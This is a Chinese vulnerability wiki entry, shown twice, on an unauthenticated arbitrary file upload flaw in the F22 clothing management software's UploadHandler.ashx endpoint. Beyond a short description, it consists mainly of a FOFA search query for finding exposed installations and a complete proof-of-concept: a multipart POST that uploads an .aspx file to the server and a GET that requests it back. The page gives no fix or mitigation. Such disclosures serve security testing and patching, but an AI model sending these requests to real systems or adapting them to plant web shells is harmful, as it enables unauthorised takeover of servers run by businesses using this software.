fofamini-wiki

登录白背景

源码

F22服装管理软件系统UploadHandler存在任意文件上传漏洞

一、漏洞简介

广州锦铭泰软件科技有限公司开发的F22服装管理软件系统UploadHandler.ashx接口存在任意文件上传漏洞，由于系统对用户上传的文件类型未作任何过滤和限制，未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。

二、影响版本

F22服装管理软件系统

三、资产测绘

fofabody="F22WEB登陆"
特征

三、漏洞复现

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

testupload
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

GET /upload/udplog/20241101183903636.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

原文: https://www.yuque.com/xiaokp7/ocvun2/afkpe98re17evpg2

# F22服装管理软件系统UploadHandler存在任意文件上传漏洞

# 一、漏洞简介
广州锦铭泰软件科技有限公司开发的F22服装管理软件系统UploadHandler.ashx接口存在任意文件上传漏洞，由于系统对用户上传的文件类型未作任何过滤和限制，未授权的攻击者可以通过此接口上传恶意后门文件获取服务器信息或权限。

# 二、影响版本
F22服装管理软件系统

# 三、资产测绘
+ fofa`body="F22WEB登陆"`
+ 特征

![1730457537214-4b469bb6-9e58-4a78-a265-a4af3a533914.png](./img/OtfYloTLlECdsFo-/1730457537214-4b469bb6-9e58-4a78-a265-a4af3a533914-475412.png)

# 三、漏洞复现
```java
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

testupload
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--
```

![1730457592087-38659a77-37cd-4e56-a3bb-babe9c2fe3e7.png](./img/OtfYloTLlECdsFo-/1730457592087-38659a77-37cd-4e56-a3bb-babe9c2fe3e7-402177.png)

```java
GET /upload/udplog/20241101183903636.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
```

![1730457732358-9f9610ff-9a49-46f5-85d4-8b3aec4c825c.png](./img/OtfYloTLlECdsFo-/1730457732358-9f9610ff-9a49-46f5-85d4-8b3aec4c825c-411214.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/afkpe98re17evpg2>